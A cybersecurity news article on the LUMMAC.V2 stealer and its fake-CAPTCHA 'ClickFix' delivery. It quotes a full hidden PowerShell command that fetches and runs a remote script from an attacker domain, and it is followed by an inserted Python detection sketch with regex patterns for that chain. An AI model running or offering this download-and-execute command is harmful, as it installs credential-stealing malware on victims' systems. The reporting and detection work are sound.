New LUMMAC.V2 Stealer Uses ClickFix Technique to Trick Users into Executing Malicious Commands

Cybersecurity experts have identified a sophisticated evolution of the LUMMAC credential stealer, now rewritten from C to C++ and operating with enhanced capabilities.

This new variant, designated LUMMAC.V2, has been observed targeting a wide range of applications including browsers, cryptocurrency wallets, password managers, remote desktop applications, email clients, and instant messaging platforms.

The malware’s primary function is to exfiltrate sensitive information such as credentials, logins, emails, personal details, system information, screenshots, and cookies, subsequently compressing this data into a ZIP archive for transmission over HTTP connections.


What makes LUMMAC.V2 particularly dangerous is its distribution method, which relies heavily on social engineering rather than technical exploits.

The malware propagates through malicious links embedded in search results, especially those related to cracked software, popular movies, or music releases.

When users click these links, they’re redirected to deceptive websites that pose as security verification pages with fake CAPTCHA challenges.

Google Cloud Security Community researchers have identified that the ClickFix technique forms the cornerstone of LUMMAC.V2’s attack methodology.

This technique tricks users into executing commands without realizing they’re initiating malware installation.

The analysis reveals multiple delivery variations, though all begin with the same social engineering approach.

Malware Lifecycle

The ClickFix technique operates by instructing users to perform seemingly innocuous actions that trigger malware execution.

When victims land on the fake CAPTCHA page, they’re guided to press Windows+R to open the Run dialog box, then instructed to press CTRL+V to paste a command that has been surreptitiously copied to their clipboard, and finally to press Enter to execute it.

Malware Lifecycle (Source – Google Cloud Security Community)

The lifecycle image above shows an example of this deceptive page in action, while the image below reveals the website’s underlying source code, which is designed to carry out this attack.

Fake captcha website (Source – Google Cloud Security Community)

Behind the scenes, the pasted PowerShell command runs with the “-W Hidden” parameter so that no console window appears. A typical command looks like:

PowerShell.exe -W Hidden -command $url = 'https://finalstepgo[.]com/uploads/pnk3.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text

This command downloads and executes additional malicious payloads, establishing persistence by creating registry entries under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.

This ensures the malware executes automatically at each system startup, maintaining its presence on infected systems.
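The chain described above (PowerShell started from the Run dialog with a hidden window, a download-and-execute cradle, then a Run-key write) leaves a distinctive footprint in endpoint telemetry. The following detection sketch is an added example, not code from the article or from Google Cloud Security Community; it assumes Sysmon-style event fields (Image, ParentImage, CommandLine, TargetObject), and the sample events, host paths, URL and Run-key value name are constructed.

```python
import re

# Added example, not the article's code: heuristics for the ClickFix chain described
# above, over Sysmon-style fields (Image, ParentImage, CommandLine, TargetObject).
PS_IMAGES = ("powershell.exe", "pwsh.exe")
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b")
DOWNLOAD_CRADLE = re.compile(r"(?i)\b(?:invoke-webrequest|iwr|downloadstring)\b")
EXEC_CRADLE = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
RUN_KEY = re.compile(r"(?i)HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\b")

def process_indicators(event: dict[str, str]) -> list[str]:
    """Indicators in one process-creation event that match the ClickFix chain."""
    hits: list[str] = []
    if not event.get("Image", "").lower().endswith(PS_IMAGES):
        return hits
    # Windows+R hands the pasted command to explorer.exe, so that is the parent.
    if event.get("ParentImage", "").lower().endswith("explorer.exe"):
        hits.append("powershell launched from explorer (Run dialog)")
    cmd = event.get("CommandLine", "")
    if HIDDEN_WINDOW.search(cmd):
        hits.append("hidden window switch")
    if DOWNLOAD_CRADLE.search(cmd) and EXEC_CRADLE.search(cmd):
        hits.append("download-and-execute cradle")
    return hits

def registry_indicators(event: dict[str, str]) -> list[str]:
    """Flag the persistence step: a Run-key value written by PowerShell."""
    if (event.get("Image", "").lower().endswith(PS_IMAGES)
            and RUN_KEY.search(event.get("TargetObject", ""))):
        return ["Run-key persistence written by PowerShell"]
    return []

def is_clickfix_like(event: dict[str, str]) -> bool:
    """Alert only when all three process-level traits coincide, to keep false positives low."""
    return len(process_indicators(event)) == 3

# Constructed sample events; host paths, URL and Run-key value name are hypothetical.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "PowerShell.exe -W Hidden -command $url = 'https://example.invalid/p.txt'; "
                    "$response = Invoke-WebRequest -Uri $url -UseBasicParsing; iex $response.Content"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(process_indicators(ev) or registry_indicators(ev) or ["no indicators"])
```

The regexes also cover the long-form spellings (-WindowStyle Hidden, Invoke-Expression, iwr) that trivial rewording of the pasted command would use; correlating a hit from process_indicators with a later registry_indicators hit from the same process tree gives the full lifecycle described above.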

The LUMMAC.V2 campaign represents a significant threat not only due to its extensive data theft capabilities but also because it exploits human behavior rather than technical vulnerabilities, making traditional security measures less effective at prevention.


Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.